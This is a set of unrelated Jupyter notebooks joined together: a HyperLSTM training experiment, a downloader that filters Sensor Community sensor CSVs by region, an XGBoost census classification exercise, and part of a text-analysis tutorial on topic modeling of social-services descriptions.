[](https://github.com/labmlai/annotated_deep_learning_paper_implementations)[](https://colab.research.google.com/github/labmlai/annotated_deep_learning_paper_implementations/blob/master/labml_nn/hypernetworks/experiment.ipynb) HyperLSTM. This is an experiment training on the Tiny Shakespeare dataset with HyperLSTM from the paper HyperNetworks.
###Code
!pip install labml-nn
from labml import experiment
from labml_nn.hypernetworks.experiment import Configs
# Create experiment
experiment.create(name="hyper_lstm", comment='')
# Create configs
conf = Configs()
# Load configurations
experiment.configs(conf,
# A dictionary of configurations to override
{'tokenizer': 'character',
'text': 'tiny_shakespeare',
'optimizer.learning_rate': 2.5e-4,
'optimizer.optimizer': 'Adam',
'prompt': 'It is',
'prompt_separator': '',
'rnn_model': 'hyper_lstm',
'train_loader': 'shuffled_train_loader',
'valid_loader': 'shuffled_valid_loader',
'seq_len': 512,
'epochs': 128,
'batch_size': 2,
'inner_iterations': 25})
# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
conf.init()
# Start the experiment
with experiment.start():
# `TrainValidConfigs.run`
conf.run()
###Output
_____no_output_____ |
notebooks/download_sensor_community.ipynb | ###Markdown
Automated .csv download. Automated download of sensor data from [Sensor Community Archive](https://archive.sensor.community/csv_per_month/). Define `MONTH_START`, `MONTH_COUNT` and `SENSORS` to specify the files that should be downloaded. Define `WAIT_BETWEEN_DOWNLOADS` to set the waiting time in minutes between the start of one download and the next; a random number between the two defined values will be used. Define `LAT_RANGE` and `LON_RANGE` for the geographical regions of interest.
###Code
import requests
from bs4 import BeautifulSoup as bs
import time
import os
import zipfile
import numpy as np
import pandas as pd
MONTH_START = "2020-01" # Start month in the format yyyy-mm
MONTH_COUNT = 1 # sensor data will be downloaded for this many months
URL = "https://archive.sensor.community/csv_per_month/"
ROOT_DIR = os.path.join(os.curdir, "../data", "")
WAIT_BETWEEN_DOWNLOADS = (0, 1)
SENSORS = [
'bme280',
# 'bmp180',
'bmp280',
'dht22',
# 'ds18b20',
# 'hpm',
# 'htu21d',
# 'pms1003',
# 'pms3003',
# 'pms5003',
# 'pms6003',
# 'pms7003',
# 'ppd42ns',
'sds011',
]
LAT_RANGE = [
(53.013, 53.1456),
(50.030681, 50.205692),
]
# Bremen: (53.013, 53.1456)
# Frankfurt a. M.: (50.030681, 50.205692)
LON_RANGE = [
(8.67, 8.9334),
(8.430634, 8.919868),
]
# Bremen: (8.67, 8.9334)
# Frankfurt a. M.: (8.430634, 8.919868)
def write_to_log(log_file, *args):
"""writes text to the defined log file
Args:
log_file: path to the log file
*args: one or more strings that are written to the log file
"""
with open(log_file, 'a') as log:
for text in args:
log.write(text)
script_start = time.time()
# make log file if it doesn't exist
date = time.strftime('%Y_%m_%d')
log_file_name = date + "_download_log.txt"
log_file_dir = os.path.join(ROOT_DIR + log_file_name)
print(log_file_dir)
if not os.path.exists(ROOT_DIR):
os.mkdir(ROOT_DIR)
if os.path.isfile(log_file_dir):
print('log file already exists.')
print('New entries will be appended.')
else:
log = open(log_file_dir, "w")
log.close()
write_to_log(log_file_dir, "Session started at " + time.strftime('%Y_%m_%d-%H_%M_%S') + '\n')
# make list of relevant months
month_current = MONTH_START
months = [MONTH_START]
for month in range(MONTH_COUNT-1):
y, m = month_current.split('-')
if m == '12':
m = '01'
y = str(int(y) + 1)
elif int(m) < 9:
m = '0' + str(int(m) + 1)
else:
m = str(int(m) + 1)
month_current = y + '-' + m
months.append(month_current)
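# The same list could also be built with pandas (already imported above), e.g.:
# months = [str(p) for p in pd.period_range(MONTH_START, periods=MONTH_COUNT, freq='M')]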
write_to_log(log_file_dir, f"Months: {months}\n")
# get download links for relevant months and sensors
for month in months:
# get url
url_curr = URL + month + '/'
print(url_curr)
write_to_log(log_file_dir, f"URL: {url_curr}\n")
# find download links according to the sensors list and save them with file names
r = requests.get(url_curr)
soup = bs(r.text)
urls = []
names = []
for i, link in enumerate(soup.findAll('a')):
if '.zip' in str(link) and any([sensor in str(link) for sensor in SENSORS]):
url_download = url_curr + link.get('href')
urls.append(url_download)
names.append(soup.select('a')[i].attrs['href'])
print("Files to download:")
for file_name in names:
print(file_name)
write_to_log(log_file_dir, f"\tFiles: {names}\n")
names_urls = zip(names, urls)
# download files
files_finished = 0
for name, url in names_urls:
# define path where downloaded file will be saved
category = name.split('.')[0].split('_')[-1]
# directory = os.path.join(ROOT_DIR, category, "")
directory = ROOT_DIR
full_path = os.path.join(directory, name)
if not os.path.exists(directory):
os.mkdir(directory)
# define path for processed .csv file
processed_dir = os.path.join(ROOT_DIR, "SensorCommunity", "")
if not os.path.exists(processed_dir):
os.mkdir(processed_dir)
name_csv = name.split('.')[0] + ".csv"
csv_processed_dir = os.path.join(processed_dir, name_csv)
# get path of unprocessed .csv file
csv_full = os.path.join(directory, name_csv)
# if the processed .csv file already exists skip download
if os.path.isfile(csv_processed_dir) or os.path.isfile(csv_full) or os.path.isfile(full_path):
if os.path.isfile(csv_processed_dir):
write_to_log(log_file_dir, \
f"\t\t{csv_processed_dir} already exists... download and processing {name} gets skipped.\n")
continue
elif os.path.isfile(csv_full):
write_to_log(log_file_dir, \
f"\t\t{csv_full} already exists... download of {name} gets skipped.\n")
elif os.path.isfile(full_path):
write_to_log(log_file_dir, \
f"\t\t{full_path} already exists... download of {name} gets skipped.\n")
# download .zip file if it doesn't exist yet
if not os.path.isfile(csv_full) and not os.path.isfile(full_path):
print(f"Start downloading {name}.")
start = time.time()
response = requests.get(url, timeout=50)
with open(full_path, 'wb') as f:
f.write(response.content)
end = time.time()
print(f"The download took {round((end - start) / 60, 1)} minutes.")
write_to_log(log_file_dir, \
f"\t\t{name}\n", \
f"\t\t\tDownload successfully finished after {(end - start) / 60} minutes.\n")
if os.path.isfile(full_path):
# unzip file
print("Unzip file...")
with zipfile.ZipFile(full_path, 'r') as zip_ref:
zip_ref.extractall(directory)
print("Unzipping finished")
write_to_log(log_file_dir, f"\t\t\t{name} unzipped\n")
# delete .zip
os.remove(full_path)
print(".zip file deleted")
write_to_log(log_file_dir, f"\t\t\t.zip file deleted\n")
# define the chunk size that is read from .csv
chunksize = 10 ** 6
# read .csv chunkwise
with pd.read_csv(csv_full, sep=";", chunksize=chunksize) as reader:
write_to_log(log_file_dir, f"\t\t\tprocessing {csv_full}\n")
print(f"processing {csv_full}\n")
for i, chunk in enumerate(reader):
# filter data by desired longitude and latitude
for j, lat in enumerate(LAT_RANGE):
df_temp = chunk[(chunk['lat'] > LAT_RANGE[j][0]) & \
(chunk['lat'] < LAT_RANGE[j][1]) & \
(chunk['lon'] > LON_RANGE[j][0]) & \
(chunk['lon'] < LON_RANGE[j][1])]
# make a new file for the first chunk and append the subsequent chunks
if not i and not j:
df_temp.to_csv(csv_processed_dir, header=True, index=False)
else:
df_temp.to_csv(csv_processed_dir, mode='a', header=False, index=False)
write_to_log(log_file_dir, f"\t\t\t\twrote chunk #{i} for region #{j}\n")
#delete original .csv file
os.remove(csv_full)
write_to_log(log_file_dir, f"\t\t\t\t{csv_full} deleted\n")
print(f"{csv_full} deleted")
# wait before next download starts
wait = np.random.randint(WAIT_BETWEEN_DOWNLOADS[0], WAIT_BETWEEN_DOWNLOADS[1])
print(f"Wait for {wait} minutes")
write_to_log(log_file_dir, f"\t\t\twait for {wait} minutes\n\n")
time.sleep(wait * 60)
print()
script_end = time.time()
print(f"Finished script after {round((script_end - script_start) / 60, 1)} minutes")
write_to_log(log_file_dir, f"Finished script after {round((script_end - script_start) / 60, 1)} minutes\n\n")
###Output
_____no_output_____ |
AppModel.ipynb | ###Markdown
###Code
!pip install eli5
!pip install xgboost
!pip install category_encoders
!pip install shap
###Output
Requirement already satisfied: eli5 in /usr/local/lib/python3.6/dist-packages (0.10.1)
Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from eli5) (1.15.0)
Requirement already satisfied: scikit-learn>=0.18 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.22.2.post1)
Requirement already satisfied: attrs>16.0.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (20.2.0)
Requirement already satisfied: graphviz in /usr/local/lib/python3.6/dist-packages (from eli5) (0.10.1)
Requirement already satisfied: tabulate>=0.7.7 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.8.7)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from eli5) (1.4.1)
Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (1.18.5)
Requirement already satisfied: jinja2 in /usr/local/lib/python3.6/dist-packages (from eli5) (2.11.2)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.18->eli5) (0.16.0)
Requirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.6/dist-packages (from jinja2->eli5) (1.1.1)
Requirement already satisfied: xgboost in /usr/local/lib/python3.6/dist-packages (0.90)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.4.1)
Requirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.18.5)
Requirement already satisfied: category_encoders in /usr/local/lib/python3.6/dist-packages (2.2.2)
Requirement already satisfied: statsmodels>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.10.2)
Requirement already satisfied: scipy>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.4.1)
Requirement already satisfied: pandas>=0.21.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.1.2)
Requirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.5.1)
Requirement already satisfied: numpy>=1.14.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.18.5)
Requirement already satisfied: scikit-learn>=0.20.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.22.2.post1)
Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2.8.1)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2018.9)
Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from patsy>=0.5.1->category_encoders) (1.15.0)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.20.0->category_encoders) (0.16.0)
Collecting shap
  Downloading https://files.pythonhosted.org/packages/d2/17/37ee6c79cafbd9bb7423b54e55ea90beec66aa7638664d607bcc28de0bae/shap-0.36.0.tar.gz (319kB)
     |████████████████████████████████| 327kB 5.5MB/s
Requirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from shap) (1.18.5)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from shap) (1.4.1)
Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from shap) (0.22.2.post1)
Requirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from shap) (1.1.2)
Requirement already satisfied: tqdm>4.25.0 in /usr/local/lib/python3.6/dist-packages (from shap) (4.41.1)
Collecting slicer
Downloading https://files.pythonhosted.org/packages/46/cf/f37ac7f61214ed044b0df91252ab19376de5587926c5b572f060eb7bf257/slicer-0.0.4-py3-none-any.whl
Requirement already satisfied: numba in /usr/local/lib/python3.6/dist-packages (from shap) (0.48.0)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->shap) (0.16.0)
Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2.8.1)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2018.9)
Requirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from numba->shap) (50.3.0)
Requirement already satisfied: llvmlite<0.32.0,>=0.31.0dev0 in /usr/local/lib/python3.6/dist-packages (from numba->shap) (0.31.0)
Requirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->shap) (1.15.0)
Building wheels for collected packages: shap
  Building wheel for shap (setup.py) ... done
Created wheel for shap: filename=shap-0.36.0-cp36-cp36m-linux_x86_64.whl size=456467 sha256=a5869ed98d3fe9b30fc0873d73389f9de87c0bde8717a1d76b9f0d9158992d09
Stored in directory: /root/.cache/pip/wheels/fb/15/e1/8f61106790da27e0765aaa6e664550ca2c50ea339099e799f4
Successfully built shap
Installing collected packages: slicer, shap
Successfully installed shap-0.36.0 slicer-0.0.4
###Markdown
Import of Libraries needed
###Code
import pandas as pd
import numpy as np
import shap
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from category_encoders import OrdinalEncoder
from xgboost import XGBClassifier
from sklearn.inspection import permutation_importance
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
from sklearn.metrics import classification_report, plot_confusion_matrix, plot_roc_curve
import matplotlib.pyplot as plt
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
###Output
_____no_output_____
###Markdown
Import Datasets
###Code
census = pd.read_csv('https://raw.githubusercontent.com/VPDeb/DS-Unit-2-Applied-Modeling/master/Build%20Week%20Project/census.csv')
###Output
_____no_output_____
###Markdown
Begin EDA
###Code
#Time to make the 'missing' values into NaN so we can work with them
census.replace({'?': np.NaN}, inplace=True)
#Printing Top Values to Fill NaNs
print('Top Value:',census['native-country'].describe())
print('Top Value:',census['occupation'].describe())
print('Top Value:',census['workclass'].describe())
#filling NaN values
census['workclass'].replace({np.NaN : 'Private'},inplace=True)
census['occupation'].replace({np.NaN : 'Prof-specialty'}, inplace=True)
census['native-country'].replace({np.NaN : 'United-States'},inplace=True)
###Output
_____no_output_____
###Markdown
Working on the wrangle function. The three def/if/else helpers below could be wrapped into one wrangle function; a consolidated version is sketched after the next cell. 🤔
###Code
#Create a New Feature that changes the income column into a 1 if they make more than 50K a year and 0 if they make 50K or less. New Feature called 'makes-50K+'.
def over50K(census):
if census['income'] == '>50K':
val = 1
else:
val = 0
return val
census['makes-50K+'] = census.apply(over50K, axis=1)
#Create a New Feature that changes the hours worked per week column into a 1 if they worked more than 40 hrs a week and 0 if they worked 40 or less. New Feature called 'over40hrs'.
def over40(census):
if census['hours-per-week'] >40:
val = 1
else:
val = 0
return val
census['over40hrs+'] = census.apply(over40, axis=1)
#Create a New Feature that changes the sex column into a 1 if they were Female and 0 if they were Male. New Feature called 'gender-F/1-M/0'. This is new Target column.
def gender(census):
if census['sex'] == 'Female':
val = 1
else:
val = 0
return val
census['gender-F/1-M/0'] = census.apply(gender, axis=1)
# Time to drop columns we don't need any longer. 'fnlwgt' is high-cardinality and unnecessary, 'sex' would now become a leaky feature, and 'income' and 'hours-per-week' are now redundant
census = census.drop(columns=['fnlwgt','income','hours-per-week','sex','capital-gain','capital-loss'])
###Output
_____no_output_____
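###Markdown
As noted above, the three def/if/else helpers can be collapsed into a single wrangle function. Below is a minimal sketch of one way to do that, assuming the same census DataFrame and column names used in this notebook; it only reproduces the transformations above rather than adding anything new.
###Code
def wrangle(df):
    """Consolidated version of the three helpers plus the column drops (illustrative sketch)."""
    df = df.copy()
    # binary features derived from the original columns
    df['makes-50K+'] = (df['income'] == '>50K').astype(int)
    df['over40hrs+'] = (df['hours-per-week'] > 40).astype(int)
    df['gender-F/1-M/0'] = (df['sex'] == 'Female').astype(int)
    # drop high-cardinality, leaky, or now-redundant columns
    return df.drop(columns=['fnlwgt', 'income', 'hours-per-week', 'sex',
                            'capital-gain', 'capital-loss'])
###Output
_____no_output_____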
###Markdown
Splitting the Data
###Code
#Split data randomly with a 60/20/20 split
train, val, test = np.split(census.sample(frac=1), [int(.6*len(census)), int(.8*len(census))])
#Split the data into X and y for training the model and making predictions
target= 'gender-F/1-M/0'
y_train = train[target]
X_train = train.drop(target,axis=1)
y_val = val[target]
X_val = val.drop(target,axis=1)
y_test = test[target]
X_test = test.drop(target,axis=1)
###Output
_____no_output_____
###Markdown
Establishing the Baseline
###Code
print('Baseline Accuracy:', y_train.value_counts(normalize=True).max())
###Output
Baseline Accuracy: 0.6679406244668146
###Markdown
Building the Model
###Code
#Starting with a pipeline. Using OrdinalEncoder for the object columns; we do not need an Imputer since the missing values were already filled with top values, and I am working with XGBClassifier.
modelxgb = make_pipeline(
OrdinalEncoder(),
XGBClassifier(n_jobs=-1)
)
modelxgb.fit(X_train,y_train)
print('Training accuracy:', modelxgb.score(X_train, y_train))
print('Validation accuracy:', modelxgb.score(X_val, y_val))
modelxgb.fit(X_train, y_train)
# make predictions for test data
y_pred = modelxgb.predict(X_test)
# evaluate predictions
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
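# Optionally, the metrics imported above can give a fuller picture than accuracy alone.
# This is an illustrative sketch using classification_report and plot_confusion_matrix,
# not part of the original evaluation.
print(classification_report(y_test, y_pred))
plot_confusion_matrix(modelxgb, X_test, y_test);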
%matplotlib inline
import seaborn as sns
sns.distplot(y_train);
from joblib import dump
dump(modelxgb, 'Pipeline.joblib2', compress=True)
###Output
_____no_output_____ |
curriculum/2_data_exploration_and_analysis/text-analysis/text_analysis_social_services.ipynb | ###Markdown
Text Analysis--- Introduction**Text analysis** is used to extract useful information from or summarize a large amount of unstructured text stored in documents. This opens up the opportunity of using text data alongside more conventional data sources (e.g. surveys and administrative data). The goal of text analysis is to take a large corpus of complex and unstructured text data and extract important and meaningful messages in a comprehensible way. Text analysis can help with the following tasks:* **Information Retrieval**: Find relevant information in a large database, such as a systematic literature review, that would be very time-consuming for humans to do manually. * **Clustering and Text Categorization**: Summarize a large corpus of text by finding the most important phrases, using methods like topic modeling. * **Text Summarization**: Create category-sensitive text summaries of a large corpus of text. * **Machine Translation**: Translate documents from one language to another. In this tutorial, we are going to analyze social services descriptions using topic modeling to examine the content of our data and document classification to tag the type of facility being described. Learning OutcomesIn this tutorial, you will...* Learn how to transform a corpus of text into a structured matrix format so that we can apply natural language processing (NLP) methods* Learn the basics and applications of topic modeling* Learn how to do document tagging and evaluate the results Glossary of Terms* **Corpus**: A corpus is the set of all text documents used in your analysis; for example, your corpus of text may include hundreds of research articles.* **Tokenize**: Tokenization is the process by which text is separated into meaningful terms or phrases. In English this is easy to do for individual words, as they are separated by whitespace; however, it can get more complicated to automate determining which groups of words constitute meaningful phrases. * **Stemming**: Stemming is normalizing text by reducing all forms or conjugations of a word to the word's most basic form. In English, this can mean making a rule of removing the suffixes "ed" or "ing" from the end of all words, but it gets more complex. For example, "to go" is irregular, so you need to tell the algorithm that "went" and "goes" stem from a common lemma, and should be considered alternate forms of the word "go."* **TF-IDF**: TF-IDF (term frequency-inverse document frequency) is an example of feature engineering where the most important words are extracted by taking into account their frequency in documents and the entire corpus of documents as a whole.* **Topic Modeling**: Topic modeling is an unsupervised learning method where groups of words that often appear together are clustered into topics. Typically, the words in one topic should be related and make sense (e.g. boat, ship, captain). Individual documents can fall under one topic or multiple topics. * **LDA**: LDA (Latent Dirichlet Allocation) is a type of probabilistic model commonly used for topic modeling. * **Stop Words**: Stop words are words that have little semantic meaning but occur very frequently, like prepositions, articles and common nouns. For example, every document (in English) will probably contain the words "and" and "the" many times. You will often remove them as part of preprocessing using a list of stop words.
###Code
%pylab inline
import nltk
import ujson
import re
import time
import progressbar
import pandas as pd
from __future__ import print_function
from six.moves import zip, range
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_recall_curve, roc_auc_score, auc
from sklearn import preprocessing
from collections import Counter, OrderedDict
from nltk.corpus import stopwords
from nltk import SnowballStemmer
#nltk.download('stopwords') #download the latest stopwords
###Output
_____no_output_____
###Markdown
Load the DataOur dataset for this tutorial is a set of descriptions of social services in Chicago; details on how the subset we're using was created can be found in the `data` folder in this tutorial.
###Code
df_socialservices_data = pd.read_csv('./data/socialservices.csv')
###Output
_____no_output_____
###Markdown
Explore the Data
###Code
df_socialservices_data.head()
###Output
_____no_output_____
###Markdown
Our table has 7 fields: `FACID`, `facname`, `factype`, `facurl`, `facloc`, `abouturl`, and `textfromurl`. How many facilities and types of facilities are in this dataset?
###Code
df_socialservices_data.factype.unique()
df_socialservices_data.facname.unique()
df_socialservices_data.facname.unique().shape
###Output
_____no_output_____
###Markdown
There are 48 facilities, categorized into 4 unique facility types: education, income, health, and safety net. Topic ModelingWe are going to apply topic modeling, an unsupervised learning method, to our corpus to find the high-level topics in our corpus as a "first go" for exploring our data. Through this process, we'll discuss how to clean and preprocess our data to get the best results.Topic modeling is a broad subfield of machine learning and natural language processing. We are going to focus on a common modeling approach called Latent Dirichlet Allocation (LDA). To use topic modeling, we first have to assume that topics exist in our corpus, and that some small number of these topics can "explain" the corpus. Topics in this context refer to words from the corpus, in a list that is ranked by probability. A single document can be explained by multiple topics. For instance, an article on net neutrality would fall under the topic "technology" as well as the topic "politics." The set of topics used by a document is known as the document's allocation, hence the name Latent Dirichlet Allocation: each document has an allocation of latent topics, allocated by a Dirichlet distribution. Processing Text DataThe first important step in working with text data is cleaning and processing the data, which includes (but is not limited to) *forming a corpus of text, tokenization, removing stop-words, finding words co-located together (N-grams), and stemming and lemmatization*. Each of these steps will be discussed below. The ultimate goal is to transform our text data into a form an algorithm can work with, because a document or a corpus of text cannot be fed directly into an algorithm. Algorithms expect numerical feature vectors with certain fixed sizes, and can't handle documents, which are basically sequences of symbols with variable length. We will be transforming our text corpus into a *bag of n-grams* to be further analyzed. In this form our text data is represented as a matrix where each row refers to a specific description (document) and each column is the occurrence of a word (feature). Bag of N-gram Representation ExampleUltimately, we want to take our collection of documents (the corpus) and convert it into a matrix. Fortunately, `sklearn` has a pre-built object, `CountVectorizer`, that can tokenize, eliminate stopwords, identify n-grams, and stem our corpus, and output a matrix in one step. Before we apply the vectorizer to our corpus of data, let's apply it to a toy example so that we see what the output looks like and how a bag of words is represented.
###Code
def create_bag_of_words(corpus,
NGRAM_RANGE=(0,1),
stop_words = None,
stem = False,
MIN_DF = 0.05,
MAX_DF = 0.95,
USE_IDF=False):
"""
Turn a corpus of text into a bag-of-words.
Parameters
-----------
corpus: ls
        list of documents in the corpus
NGRAM_RANGE: tuple
range of N-gram. Default (0,1)
stop_words: ls
        list of commonly occurring words that have little semantic
value
stem: bool
use a stemmer to stem words
MIN_DF: float
exclude words that have a frequency less than the threshold
MAX_DF: float
exclude words that have a frequency greater than the threshold
Returns
-------
bag_of_words: scipy sparse matrix
scipy sparse matrix of text
features:
ls of words
"""
#parameters for vectorizer
    ANALYZER = "word" #unit of features are single words rather than phrases of words
STRIP_ACCENTS = 'unicode'
stemmer = nltk.SnowballStemmer("english")
if stem:
tokenize = lambda x: [stemmer.stem(i) for i in x.split()]
else:
tokenize = None
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=tokenize,
ngram_range=NGRAM_RANGE,
stop_words = stop_words,
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
    bag_of_words = vectorizer.fit_transform( corpus ) #transform our corpus into a bag of words
features = vectorizer.get_feature_names()
if USE_IDF:
        NORM = None #no normalization of the term vectors
        SMOOTH_IDF = True #prevents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
tfidf = transformer.fit_transform(bag_of_words)
return tfidf, features
else:
return bag_of_words, features
toy_corpus = ['this is document one', 'this is document two', 'text analysis on documents is fun']
toy_bag_of_words, toy_features = create_bag_of_words(toy_corpus)
toy_corpus
toy_features
np_bag_of_words = toy_bag_of_words.toarray()
np_bag_of_words
###Output
_____no_output_____
###Markdown
Our data has been transformed from a corpus of three documents into a 3 x 9 matrix, where each row in the matrix corresponds to a document, and each column corresponds to a feature (in the order they appear in `toy_features`). A 1 indicates the existence of the feature or word in the document, and a 0 indicates the word is not present.It is very common that this representation will be a "sparse" matrix, or a matrix that has a lot of 0s. With sparse matrices, it is often more efficient to keep track of which values *aren't* 0 and where those non-zero entries are located, rather than to save the entire matrix. To save space, the `scipy` library has special ways of storing sparse matrices in an efficient way. Our toy corpus is now ready to be analyzed. We used this toy example to illustrate how a document is turned into a matrix to be used in text analysis. When you're applying this to real text data, the matrix will be much larger and harder to interpret, but it's important that you know the process. --- Exercise 1 To check your knowledge, make your own toy corpus and turn it into a matrix.
###Code
#solution
exercise_corpus = ['Batman is friends with Superman',
'Superman is enemies with Lex Luthor',
'Batman is enemies with Lex Luthor']
exercise_bag_of_words, exercise_features = create_bag_of_words(exercise_corpus)
np_bag_of_words = exercise_bag_of_words.toarray()
exercise_features
np_bag_of_words
###Output
_____no_output_____
###Markdown
--- Word CountsAs an initial look into the data, we can examine the most frequently occuring words in our corpus. We can sum the columns of the bag_of_words and then convert to a numpy array. From here we can zip the features and word_count into a dictionary, and display the results.
###Code
def get_word_counts(bag_of_words, feature_names):
"""
Get the ordered word counts from a bag_of_words
Parameters
----------
bag_of_words: obj
scipy sparse matrix from CounterVectorizer
feature_names: ls
list of words
Returns
-------
word_counts: dict
Dictionary of word counts
"""
np_bag_of_words = bag_of_words.toarray()
word_count = np.sum(np_bag_of_words,axis=0)
np_word_count = np.asarray(word_count).ravel()
dict_word_counts = dict( zip(feature_names, np_word_count) )
orddict_word_counts = OrderedDict(
sorted(dict_word_counts.items(), key=lambda x: x[1], reverse=True), )
return orddict_word_counts
get_word_counts(toy_bag_of_words, toy_features)
###Output
_____no_output_____
###Markdown
Note that the words "document" and "documents" both appear separately in the list. Should they be treated as the same words, since one is just the plural of the other, or should they be considered distinct words? These are the types of decisions you will have to make in your preprocessing steps. --- Exercise 2 Get the word counts of your exercise corpus.
###Code
get_word_counts(exercise_bag_of_words, exercise_features)
###Output
_____no_output_____
###Markdown
Text CorporaFirst we need to form our corpus, or the set of all descriptions from all websites. We can pull out the array of descriptions from the data frame using the data frame's `.values` attribute.
###Code
corpus = df_socialservices_data['textfromurl'].values #pull all the descriptions and put them in a numpy array
corpus
def create_topics(tfidf, features, N_TOPICS=3, N_TOP_WORDS=5,):
"""
Given a matrix of features of text data generate topics
Parameters
-----------
tfidf: scipy sparse matrix
sparse matrix of text features
N_TOPICS: int
number of topics (default 10)
N_TOP_WORDS: int
number of top words to display in each topic (default 10)
Returns
-------
ls_keywords: ls
list of keywords for each topics
doctopic: array
numpy array with percentages of topic that fit each category
N_TOPICS: int
number of assumed topics
N_TOP_WORDS: int
Number of top words in a given topic.
"""
with progressbar.ProgressBar(max_value=progressbar.UnknownLength) as bar:
i=0
lda = LatentDirichletAllocation( n_topics= N_TOPICS,
learning_method='online') #create an object that will create 5 topics
bar.update(i)
i+=1
doctopic = lda.fit_transform( tfidf )
bar.update(i)
i+=1
ls_keywords = []
for i,topic in enumerate(lda.components_):
word_idx = np.argsort(topic)[::-1][:N_TOP_WORDS]
keywords = ', '.join( features[i] for i in word_idx)
ls_keywords.append(keywords)
print(i, keywords)
bar.update(i)
i+=1
return ls_keywords, doctopic
corpus_bag_of_words, corpus_features = create_bag_of_words(corpus)
###Output
_____no_output_____
###Markdown
Let's examine our features.
###Code
corpus_features
###Output
_____no_output_____
###Markdown
The first aspect to notice about the feature list is that the first few entries are numbers that have no real semantic meaning. The feature list also includes numerous other useless words, such as prepositions and articles, that will just add noise to our analysis. We can also notice the words *action* and *activities*, or the words *addition* and *additional*, are close enough to each other that it might not make sense to treat them as entirely separate words. Part of your cleaning and preprocessing duties will be manually inspecting your lists of features, seeing where these issues arise, and making decisions to either remove them from your analysis or address them separately. Let's get the count of the number of times that each of the words appears in our corpus.
###Code
get_word_counts(corpus_bag_of_words, corpus_features)
###Output
_____no_output_____
###Markdown
Our top words are articles, prepositions and conjunctions that are not informative whatsoever, so we're probably not going to come up with anything interesting ("garbage in, garbage out"). Nevertheless, let's forge blindly ahead and try to create topics, and see the quality of the results that we get.
###Code
ls_corpus_keywords, corpus_doctopic = create_topics(corpus_bag_of_words, corpus_features)
###Output
_____no_output_____
###Markdown
These topics don't give us any real insight into what the data contains - one of the topics is "and, the, to, of, in"! There are some hints to the subjects of the websites ("YWCA", "youth") and their locations ("Evanston"), but the signal is being swamped by the noise. The word "click" also comes up. This word might be useful in some contexts, but since we scraped this data from websites, it's likely that "click" is more related to the website itself (e.g. "Click here to find out more") as opposed to the content of the website. We'll have to clean and process our data to get any meaningful information out of this text. Text Cleaning and NormalizationTo clean and normalize text, we'll remove all special characters, numbers, and punctuation, so we're left with only the words themselves. Then we will make all the text lowercase; this uniformity will ensure that the algorithm doesn't treat "the" and "The" as different words, for example. To remove the special characters, numbers and punctuation we will use regular expressions. **Regular Expressions**, or "regexes" for short, let you find all the words or phrases in a document or text file that match a certain pattern. These rules are useful for pulling out useful information from a large amount of text. For example, if you want to find all email addresses in a document, you might look for everything that looks like *some combination of letters, _, .* followed by *@*, followed by more letters, and ending in *.com* or *.edu*. If you want to find all the credit card numbers in a document, you might look for everywhere you see the pattern "four numbers, space, four numbers, space, four numbers, space, four numbers." Regexes are also helpful if you are scraping information from websites, because you can use them to separate the content from the HTML code used for formatting the website.A full tutorial on regular expressions would be outside the scope of this tutorial, but many good tutorials can be found online. [regex101.com](regex101.com) is also a great interactive tool for developing and checking regular expressions.>"Some people, when confronted with a problem, think >'I know, I'll use regular expressions.' Now they have two problems."> -- Jaime Zawinski*A word of warning:* Regexes can work much more quickly than plain text sorting; however, if your regular expressions are becoming overly complicated, it's a good idea to find a simpler way to do what you want to do. Any 